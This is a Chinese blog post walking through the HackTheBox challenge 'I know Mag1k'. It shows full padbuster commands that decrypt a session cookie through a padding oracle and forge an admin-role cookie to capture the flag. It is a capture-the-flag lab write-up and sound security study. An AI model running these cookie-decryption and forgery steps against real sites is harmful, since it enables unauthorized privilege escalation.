其他分享
首页 > 其他分享> > HackTheBox 复现系列:I know Mag1k

HackTheBox 复现系列:I know Mag1k

作者:互联网

前言

在自己进行测试的时候,尝试了目录扫描,爆破弱口令,SQL注入测试,无果。完成没有头绪,通过谷歌发现此篇文章

https://medium.com/@mrkarthik07/i-know-mag1k-a-padding-oracle-attack-745d3b0bb2b1

发现是利用 Padding Oracle attack 来解密 Cookie。太高级看不懂如下:

我对Padding Oracle攻击的分析和思考(详细):https://www.freebuf.com/articles/web/15504.html

操作

随意注册一个用户,进行登录

在 Kali 使用 padbuster 工具,命令如下:padbuster URL 需要解密的Cookie 8 -cookies "登录的Cookie"

padbuster http://167.71.143.20:30469/profile.php "qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D" 8 -cookies "PHPSESSID=vhupjvokjsas3dk96dp7sal6t4;iknowmag1k=qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D"

然后选择:2

经过漫长的等待解出内容,我的网速太慢了

修改 role 为 admin 然后进行加密

padbuster http://167.71.143.20:30469/profile.php "qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D" 8 -cookies "PHPSESSID=vhupjvokjsas3dk96dp7sal6t4;iknowmag1k=qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D" -plaintext "{\"user\":\"admin\",\"role\":\"admin\"}"

成功得到加密的内容

替换Cookie 成功拿到 Flag

完成没有思路,也不了解怎么能联想到 Padding Oracle attack 。归于原因还是因为自己太菜

标签:Mag1k,3D%,2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%,2BS7NEdfc%,HackTheBox,Cookie,know,2BO
来源: https://www.cnblogs.com/yuyan-sec/p/14527302.html